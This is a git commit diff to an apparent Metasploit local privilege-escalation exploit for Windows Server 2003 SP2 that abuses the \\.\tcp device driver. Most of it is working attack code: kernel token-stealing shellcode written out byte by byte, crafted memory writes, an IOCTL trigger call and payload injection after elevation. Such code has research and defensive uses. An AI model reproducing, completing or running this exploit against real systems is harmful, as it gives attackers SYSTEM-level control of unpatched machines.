Modify the shellcode stub to save the process

2015-02-05 13:54:52 -05:00
parent aebf5056ac
commit dabc163076
1 changed files with 31 additions and 55 deletions
@@ -38,7 +38,14 @@ class Metasploit3 < Msf::Exploit::Local
        },
      'Targets'       =>
        [
-          ['Windows Server 2003 SP2', {} ]
+          ['Windows Server 2003 SP2',
+            {
+              '_KPROCESS' => "\x38",
+              '_TOKEN' => "\xd8",
+              '_UPID' => "\x94",
+              '_APLINKS' => "\x98"
+            }
+          ]
        ],
      'References'    =>
        [
@@ -76,19 +83,6 @@ class Metasploit3 < Msf::Exploit::Local
    return Exploit::CheckCode::Safe
  end

-  def create_proc
-    windir = session.sys.config.getenv('windir')
-    cmd = "#{windir}\\System32\\notepad.exe"
-    # run hidden
-    begin
-      proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
-    rescue Rex::Post::Meterpreter::RequestError
-      return nil
-    end
-
-    proc.pid
-  end
-
  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
@@ -104,18 +98,6 @@ class Metasploit3 < Msf::Exploit::Local
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

-    p = payload.encoded
-    new_pid = create_proc
-
-    unless new_pid
-      fail_with(Failure::Unknown, 'Unable to create a new process.')
-    end
-
-    print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
-    unless execute_shellcode(p, nil, new_pid)
-      fail_with(Failure::Unknown, 'Error while executing the payload')
-    end
-
    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
@@ -132,33 +114,26 @@ class Metasploit3 < Msf::Exploit::Local

    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"

-    sc = "\x60"                       # save registers
-    sc << "\x64\xA1\x24\x01\x00\x00"  # mov eax, [fs:0x124]
-    sc << "\x8B\x40\x38"              # mov eax, [eax+0x38]
-    sc << "\x50"                      # push eax
-    sc << "\xBB\x04\x00\x00\x00"      # mov ebx, 0x4
-    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
-    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
-    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
-    sc << "\x75\xED"                  # jne 0x10
-    sc << "\x8B\xB8\xD8\x00\x00\x00"  # mov edi, [eax+0xd8]
-    sc << "\x83\xE7\xF8"              # and edi, 0xfffffff8
-    sc << "\x58"                      # pop eax
-    sc << "\xBB"                      # mov ebx, new_pid
-    sc << [new_pid].pack('V')
-    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
-    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
-    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
-    sc << "\x75\xED"                  # jne 0x32
-    sc << "\x89\xB8\xD8\x00\x00\x00"  # mov [eax+0xd8], edi
-    sc << "\x61"                      # restore registers
-    sc << "\xBA\x39\xFF\xA2\xBA"      # mov edx, 0xbaa2ff39
-    sc << "\xB9\x00\x00\x00\x00"      # mov ecx, 0x0
-    sc << "\xB8\x3B\x00\x00\x00"      # mov eax, 0x3b
-    sc << "\x8E\xE0"                  # mov fs, eax
-    sc << "\x0F\x35\x00"              # sysexit
+    sc  = token_stealing_shellcode(target)[0..-3]
+    # move up the stack frames looking for nt!KiSystemServicePostCall
+    sc << "\x31\xc9"                     # xor ecx, ecx
+    sc << "\x89\xeb"                     # mov ebx, ebp
+    # count_frames
+    sc << "\x41"                         # inc ecx
+    sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000
+    sc << "\x8b\x1b"                     # mov ebx, dword [ebx]
+    sc << "\x75\xf4"                     # jne short count_frames
+    sc << "\x49"                         # dec ecx
+    # loop_frames
+    sc << "\x49"                         # dec ecx
+    sc << "\x89\xec"                     # mov esp, ebp
+    sc << "\x5d"                         # pop ebp
+    sc << "\x83\xf9\x00"                 # cmp ecx, 0
+    sc << "\x75\xf7"                     # jne loop_frames
+    sc << "\x31\xc0"                     # xor eax, eax
+    sc << "\xc3"

-    this_proc.memory.write(0x28, "\x87\xFF\xFF\x38")
+    this_proc.memory.write(0x28, "\x87\xff\xff\x38")
    this_proc.memory.write(0x38, "\x00\x00")
    this_proc.memory.write(0x1100, buf)
    this_proc.memory.write(0x2b, "\x00\x00")
@@ -166,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Local

    print_status("Triggering the vulnerability...")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
-    session.railgun.kernel32.CloseHandle(handle)
+    #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it

    print_status("Checking privileges after exploitation...")

@@ -175,8 +150,9 @@ class Metasploit3 < Msf::Exploit::Local
    end

    print_good("Exploitation successful!")
-
+    unless execute_shellcode(payload.encoded, nil, this_proc.pid)
+      fail_with(Failure::Unknown, 'Error while executing the payload')
+    end
  end

 end
-